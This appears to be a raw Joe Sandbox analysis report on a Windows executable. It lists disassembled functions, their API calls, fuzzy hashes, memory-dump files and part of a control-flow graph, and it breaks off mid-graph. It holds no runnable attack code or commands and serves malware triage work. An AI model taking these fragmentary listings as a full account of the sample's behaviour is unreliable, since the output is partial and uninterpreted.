                                                • Opcode Fuzzy Hash: fe7133a2f93821227e3a7e703367dd144469a15fe8ff947d0f1e508e715dc704
                                                • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                Function 00401DB3 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDC.USER32(?), ref: 00401DB6
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E38
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                • String ID:
                                                • API String ID: 3808545654-0
                                                • Opcode ID: 8f9191b43f1087fd91e2bc6620e9991732759c8a76e5fb6f86f4dddf7fac1548
                                                • Instruction ID: 8058adb7fc53f801c03006c9ef56a62efa99793a140a93f16ed6c143b7d909dc
                                                • Opcode Fuzzy Hash: 8f9191b43f1087fd91e2bc6620e9991732759c8a76e5fb6f86f4dddf7fac1548
                                                • Instruction Fuzzy Hash: 9A015271944240EFE701ABB4AE8A6D97FB49F95301F10457EE241F61E2CAB800459F2D
                                                Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2455471246.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2455454451.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.2455493031.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.2455538566.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                • String ID:
                                                • API String ID: 1148316912-0
                                                • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: 9ccf06a462700f0ed3a97b5983b11f9e7e1ee2bcf46f86b5230f61e7ee9921c4
                                                • Instruction ID: face61d34558c4de7c2b3a6e9a6cb1e1a296a7661f17e088ac2b3614559d71e0
                                                • Opcode Fuzzy Hash: 9ccf06a462700f0ed3a97b5983b11f9e7e1ee2bcf46f86b5230f61e7ee9921c4
                                                • Instruction Fuzzy Hash: 2DF0FF72604518AFDB01DBE4DF88CEEB7BCEB48341B14047AF641F6191CA749D019B78
                                                Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
                                                • Instruction ID: 74a91dccfe9731269d403f92625f9bdea7e35384dcad0b9637cdbdb8d435ba20
                                                • Opcode Fuzzy Hash: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
                                                • Instruction Fuzzy Hash: 4D21C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D0D7B84541DB18
                                                Function 00404AA2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B43
                                                • wsprintfW.USER32 ref: 00404B4C
                                                • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s
                                                • API String ID: 3540041739-3551169577
                                                • Opcode ID: c9a6e7e492f6bdeefc1d450629950baf89c1ca8cbbe940ede2bd0e57b0caaae8
                                                • Instruction ID: a69b8d9c405cb410f429d1b91b3aaf5cd8934f07bb3ea9cf38393447591b3b6c
                                                • Opcode Fuzzy Hash: c9a6e7e492f6bdeefc1d450629950baf89c1ca8cbbe940ede2bd0e57b0caaae8
                                                • Instruction Fuzzy Hash: EA11EB736041283BDB00A66DDC42E9F369CDB81338F154237FA66F21D1D9B8D82146E8
                                                Function 00405B53 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00405B59
                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00405B63
                                                • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B75
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B53
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 2659869361-3081826266
                                                • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                • Instruction ID: 33d5b4b63083ad43afaa288e046e1f08ed21b79f7f5b9eb46acb358563388364
                                                • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                • Instruction Fuzzy Hash: 86D05E31101924AAC121BB549C04DDF63ACAE86304342087AF541B20A5C77C296286FD
                                                Function 00402E5D Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                Download Yara Rule
                                                APIs
                                                • DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
                                                • GetTickCount.KERNEL32 ref: 00402E8E
                                                • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
                                                • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                • String ID:
                                                • API String ID: 2102729457-0
                                                • Opcode ID: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
                                                • Instruction ID: fb236cf74f4011b48551144809540ae7a3d608603197ef92b98d1837a73ee17d
                                                • Opcode Fuzzy Hash: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
                                                • Instruction Fuzzy Hash: BDF05E30941620EBC6316B20FF0DA9B7B69BB44B42745497AF441B19E8C7B44881CBDC
                                                Function 004038FB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF3420,004038D3,004036E9,00000006,?,00000006,00000008,0000000A), ref: 00403915
                                                • GlobalFree.KERNEL32(?), ref: 0040391C
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040390D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Free$GlobalLibrary
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 1100898210-3081826266
                                                • Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                • Instruction ID: e66732d9f8c7dde22b06ec40e1a6716a7c13e86cf839674f34118547447e98ef
                                                • Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                • Instruction Fuzzy Hash: 95E012739019209BC6215F55ED08B5E7B68AF58B22F05447AE9807B26087B45C929BD8
                                                Function 00405B9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3507071243740008011.exe,C:\Users\user\Desktop\3507071243740008011.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BA5
                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3507071243740008011.exe,C:\Users\user\Desktop\3507071243740008011.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BB5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrlen
                                                • String ID: C:\Users\user\Desktop
                                                • API String ID: 2709904686-224404859
                                                • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                • Instruction ID: a8af4f0e04a9cb416ac945bb8770274a79718c16fb62e87aa8b604c5d62251ee
                                                • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                • Instruction Fuzzy Hash: D5D05EB24019209AD3126B08DC00DAF73A8EF5230074A48AAE841A6165D7B87D8186AC
                                                Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                • GlobalFree.KERNEL32(?), ref: 10001203
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2455471246.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2455454451.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.2455493031.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.2455538566.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                Function 00405CD9 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D01
                                                • CharNextA.USER32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D12
                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                • Instruction ID: eb4b2eb4961b7d09ea4a34ed08b3b50e56f073c3670a6d3e208c08a45fec6953
                                                • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                • Instruction Fuzzy Hash: 10F0F631204918FFD7029FA4DD0499FBBA8EF16350B2580BAE840FB211D674DE01AB98

                                                Execution Graph

                                                Execution Coverage:0%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:100%
                                                Total number of Nodes:1
                                                Total number of Limit Nodes:0
                                                execution_graph 81223 36da2df0 LdrInitializeThunk

                                                Executed Functions

                                                Function 36DA35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1 36da35c0-36da35cc LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8bcc5cb114d1a01777abb8a01ea6b8a8407f82587b698369e809eb5e0aa59274
                                                • Instruction ID: 90f8c42091854c3df716593cb754e7f96676824cefcffe161132fa3bcf74a39c
                                                • Opcode Fuzzy Hash: 8bcc5cb114d1a01777abb8a01ea6b8a8407f82587b698369e809eb5e0aa59274
                                                • Instruction Fuzzy Hash: 9190023164550402D60071584914B06100547D0201F65C412A143573CD8B958A556DA2
                                                Function 36DA2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 36da2df0-36da2dfc LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 5e023c2681b1bd5c2a393f99a6f9292d5d3a183d201cb702dfdc9eb69e636332
                                                • Instruction ID: a258323958d3cdeb6e7ca6d03dcdc0455b10199c2e9256982060e8a4c5332116
                                                • Opcode Fuzzy Hash: 5e023c2681b1bd5c2a393f99a6f9292d5d3a183d201cb702dfdc9eb69e636332
                                                • Instruction Fuzzy Hash: E390023124140413D61171584904B07000947D0241F95C413A143572CD9A568A56A921

                                                Non-executed Functions

                                                Function 36E094E0 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 553 36e094e0-36e09529 554 36e09578-36e09587 553->554 555 36e0952b-36e09530 553->555 556 36e09534-36e0953a 554->556 557 36e09589-36e0958e 554->557 555->556 559 36e09540-36e09564 call 36da9020 556->559 560 36e09695-36e096bd call 36da9020 556->560 558 36e09d13-36e09d27 call 36da4c30 557->558 569 36e09593-36e09634 GetPEB call 36e0dc65 559->569 570 36e09566-36e09573 call 36e2972b 559->570 567 36e096dc-36e09712 560->567 568 36e096bf-36e096da call 36e09d2a 560->568 574 36e09714-36e09716 567->574 568->574 580 36e09652-36e09667 569->580 581 36e09636-36e09644 569->581 579 36e0967d-36e09690 RtlDebugPrintTimes 570->579 574->558 578 36e0971c-36e09731 RtlDebugPrintTimes 574->578 578->558 587 36e09737-36e0973e 578->587 579->558 580->579 583 36e09669-36e0966e 580->583 581->580 582 36e09646-36e0964b 581->582 582->580 585 36e09670 583->585 586 36e09673-36e09676 583->586 585->586 586->579 587->558 589 36e09744-36e0975f 587->589 590 36e09763-36e09774 call 36e0a808 589->590 593 36e09d11 590->593 594 36e0977a-36e0977c 590->594 593->558 594->558 595 36e09782-36e09789 594->595 596 36e098fc-36e09902 595->596 597 36e0978f-36e09794 595->597 600 36e09908-36e09937 call 36da9020 596->600 601 36e09a9c-36e09aa2 596->601 598 36e09796-36e0979c 597->598 599 36e097bc 597->599 598->599 602 36e0979e-36e097b2 598->602 603 36e097c0-36e09811 call 36da9020 RtlDebugPrintTimes 599->603 619 36e09970-36e09985 600->619 620 36e09939-36e09944 600->620 605 36e09af4-36e09af9 601->605 606 36e09aa4-36e09aad 601->606 609 36e097b4-36e097b6 602->609 610 36e097b8-36e097ba 602->610 603->558 647 36e09817-36e0981b 603->647 607 36e09ba8-36e09bb1 605->607 608 36e09aff-36e09b07 605->608 606->590 613 36e09ab3-36e09aef call 36da9020 606->613 607->590 618 36e09bb7-36e09bba 607->618 615 36e09b13-36e09b3d call 36e08513 608->615 616 36e09b09-36e09b0d 608->616 609->603 610->603 632 36e09ce9 613->632 644 36e09b43-36e09b9e call 36da9020 RtlDebugPrintTimes 615->644 645 36e09d08-36e09d0c 615->645 616->607 616->615 621 36e09bc0-36e09c0a 618->621 622 36e09c7d-36e09cb4 call 36da9020 618->622 626 36e09991-36e09998 619->626 627 